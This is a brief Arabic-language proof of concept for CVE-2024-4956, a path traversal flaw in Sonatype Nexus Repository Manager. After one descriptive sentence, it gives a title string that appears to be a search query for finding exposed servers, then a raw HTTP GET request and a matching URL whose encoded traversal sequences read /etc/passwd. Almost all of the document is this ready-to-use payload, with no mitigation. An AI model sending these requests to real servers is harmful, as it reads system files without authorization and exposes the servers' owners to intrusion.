
إثبات مفهوم لاستغلال CVE-2024-4956، وهي ثغرة من نوع تجاوز المسار في Sonatype Nexus Repository Manager، تسمح بقراءة ملفات غير مصرح بها عبر طلبات HTTP مصممة خصيصًا.
العنوان="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip
http://x.x.x.x/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
